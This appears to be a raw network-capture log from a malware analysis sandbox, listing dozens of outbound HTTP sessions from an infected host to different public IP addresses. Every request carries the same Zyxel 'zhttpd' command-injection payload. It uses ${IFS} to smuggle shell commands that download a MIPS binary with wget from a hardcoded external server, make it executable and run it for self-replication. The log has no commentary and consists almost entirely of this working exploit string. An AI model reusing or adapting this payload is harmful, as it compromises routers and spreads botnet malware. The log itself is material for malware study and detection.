                                          Jan 14, 2024 15:46:04.766729116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1565192.168.2.2345520166.51.189.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766762018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1566192.168.2.2354156209.77.76.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766808987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1567192.168.2.236071870.118.81.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766843081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1568192.168.2.2333204155.32.74.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766860008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1569192.168.2.233935827.249.143.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766885996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1570192.168.2.2349550103.52.114.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766946077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1571192.168.2.2338592122.118.215.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766973972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1572192.168.2.2353594142.179.64.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767002106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1573192.168.2.2356708203.0.66.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767047882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1574192.168.2.2339492220.236.175.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767054081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1575192.168.2.235041881.53.80.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767112017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1576192.168.2.234234843.179.219.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767143965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1577192.168.2.233303867.45.128.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767153025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1578192.168.2.2357148210.199.128.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767200947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1579192.168.2.233360298.35.239.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767200947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1580192.168.2.2344732164.0.212.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767263889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1581192.168.2.2359648107.198.54.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767278910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1582192.168.2.2337718143.144.75.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767323017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1583192.168.2.234579284.18.89.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767366886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1584192.168.2.2354074142.214.214.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767422915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1585192.168.2.234537699.7.36.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767422915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1586192.168.2.235496094.49.43.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767462969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1587192.168.2.234656842.60.152.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767488956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1588192.168.2.2349144177.146.23.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767503023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1589192.168.2.2343960169.35.105.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767563105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1590192.168.2.233696891.182.168.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767596960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1591192.168.2.2359486129.128.194.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767637968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1592192.168.2.235911285.87.207.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767652988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1593192.168.2.2360926108.169.147.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767676115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1594192.168.2.234820658.195.173.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767741919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1595192.168.2.235459837.178.240.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767748117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1596192.168.2.23422504.170.18.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767764091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1597192.168.2.234227045.125.66.10443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767805099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1598192.168.2.2342838159.2.34.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767870903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1599192.168.2.2340350103.122.20.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767887115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1600192.168.2.2339958195.67.65.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767910004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1601192.168.2.2347902220.9.151.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767956972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1602192.168.2.2340248103.190.92.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.767982006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1603192.168.2.2355180143.82.156.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768013954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1604192.168.2.23486804.60.250.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768042088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1605192.168.2.2341542162.57.244.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768076897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1606192.168.2.2339442157.213.193.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768104076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1607192.168.2.234846214.117.13.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768115997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1608192.168.2.235367043.163.230.231443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768136978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1609192.168.2.233952049.88.134.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768202066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1610192.168.2.2342334183.252.219.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768243074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1611192.168.2.236002823.225.116.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768270969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1612192.168.2.2334260190.227.178.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768312931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1613192.168.2.235437419.123.51.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768342972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1614192.168.2.2344998218.84.0.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768379927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1615192.168.2.2335356104.99.240.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768424034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1616192.168.2.234158243.134.219.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768435955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1617192.168.2.2349478210.146.139.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768496990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1618192.168.2.23466322.32.205.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768516064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1619192.168.2.233782081.39.117.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768565893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1620192.168.2.2346584174.7.248.185443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768599987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1621192.168.2.2333668159.103.58.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768642902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1622192.168.2.2337110149.236.121.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768646002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1623192.168.2.2349548101.111.155.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768680096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1624192.168.2.234066087.174.121.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768680096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1625192.168.2.2347300222.225.183.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768719912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1626192.168.2.2335012158.232.82.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.768767118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1627192.168.2.234512437.181.204.171443
                                          TimestampBytes transferredDirectionData
